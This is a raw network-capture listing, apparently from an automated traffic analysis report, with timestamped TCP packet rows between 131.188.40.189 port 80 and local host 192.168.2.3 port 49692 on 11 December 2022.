                          Dec 11, 2022 09:25:09.743458033 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.743522882 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.743556976 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.743602037 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.743634939 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.743642092 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.743669033 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.743684053 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.743704081 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.743736982 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.743756056 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.743777037 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.743812084 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.743815899 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.743952990 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.763847113 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.763911009 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.763951063 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.763993979 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.764029026 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.764034986 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.764064074 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.764076948 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.764097929 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.764142036 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.764163017 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.764197111 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.764203072 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.764236927 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.764271975 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.764272928 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.764272928 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.764306068 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.764339924 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.764341116 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.764373064 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.764420033 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.764453888 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.764482021 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.764487982 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.764523983 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.764529943 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.764559031 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.764561892 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.764700890 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.784560919 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.784606934 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.784662962 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.784697056 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.784723997 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.784728050 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.784759045 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.784770966 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.784795046 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.784826994 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.784830093 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.784862995 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.784912109 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.784939051 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.784945011 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.784957886 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.784981012 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785013914 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785058975 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785084009 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.785094976 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785105944 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.785130978 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785166025 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785200119 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785200119 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.785234928 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785268068 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785316944 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785351038 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785358906 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.785384893 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785429001 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785454035 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.785464048 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785496950 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785533905 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.785541058 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785567045 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.785576105 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785610914 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785651922 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785685062 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.785686016 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785721064 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785751104 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.785756111 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785790920 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785816908 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.785824060 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785851955 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.785860062 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785895109 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785928011 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785933971 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.785962105 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.785998106 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.786029100 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.786154985 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.806217909 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.806286097 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.806320906 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.806365013 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.806397915 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.806400061 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.806433916 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.806440115 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.806468010 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.806502104 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.806512117 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.806535959 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.806571007 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.806576014 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.806605101 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.806649923 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.806674957 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.806684017 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.806690931 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.806719065 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.806751966 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.806786060 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.806797981 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.806819916 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.806830883 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.806854010 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.806916952 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.806950092 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.806984901 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.806996107 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.807010889 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.807019949 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807055950 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807100058 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807133913 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807136059 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.807156086 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.807168007 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807204008 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807250977 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807275057 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.807292938 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807316065 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.807327032 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807360888 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807394028 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807394981 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.807427883 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807461977 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807466984 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.807501078 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807523012 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.807528019 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807562113 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807595015 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807595015 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.807627916 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807656050 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.807662964 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807696104 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807728052 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807735920 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.807760954 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807794094 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807807922 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.807826996 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807854891 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.807859898 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807892084 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807934046 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807944059 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.807969093 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.807985067 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.808012962 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808043957 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808085918 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808113098 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.808119059 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808132887 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.808151960 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808192015 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808211088 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.808238983 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808271885 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808314085 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808337927 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.808347940 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808363914 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.808382988 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808417082 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808449030 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808459997 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.808482885 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808502913 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.808516026 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808549881 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808592081 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808609009 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.808626890 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808643103 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.808660984 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808693886 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808737993 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808770895 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808770895 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.808798075 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.808808088 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808854103 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808871031 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808902025 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.808903933 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808938026 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.808943987 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.808971882 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.809003115 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.809005022 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.809048891 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.809076071 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.809084892 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.809207916 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.829000950 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829046011 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829081059 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829123974 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829158068 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829169035 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.829191923 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829217911 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.829227924 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829274893 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829298973 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.829308987 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829343081 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829382896 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.829389095 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829405069 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.829425097 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829457998 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829492092 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829504013 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.829528093 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829561949 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829561949 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.829595089 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829638958 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829665899 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.829674006 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829696894 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.829708099 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829741001 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829773903 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829807043 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829807043 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.829833031 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.829850912 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829901934 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829952955 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.829962969 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.829987049 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830022097 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830028057 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.830059052 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830091953 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830126047 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830127001 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.830166101 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.830173969 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830209970 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830244064 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830281019 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.830291033 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830302000 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.830326080 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830370903 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830394983 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.830415010 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830450058 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830491066 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830526114 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.830535889 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830568075 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.830571890 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830600023 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830643892 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830668926 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.830688953 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830710888 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.830722094 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830754995 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830796957 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830830097 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830831051 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.830853939 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.830863953 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830936909 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.830956936 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.830965996 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831000090 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831043005 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831075907 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831084013 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.831110001 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831120014 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.831146955 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831172943 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831196070 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.831206083 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831228971 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.831239939 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831273079 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831319094 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831351995 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831357956 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.831378937 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.831386089 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831418991 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831453085 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831470013 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.831486940 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831521034 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831526041 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.831553936 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831595898 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831619978 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.831629992 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831655025 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.831664085 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831696987 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831741095 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831768990 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.831774950 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831787109 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.831813097 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831846952 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831880093 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831895113 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.831913948 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831928015 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.831947088 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.831979990 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.832022905 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.832051039 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.832056999 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.832093000 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.832103014 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.832137108 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.832170963 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.832204103 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.832233906 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.832250118 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.832283020 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:09.832283974 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:09.832319021 CET8049692131.188.40.189192.168.2.3
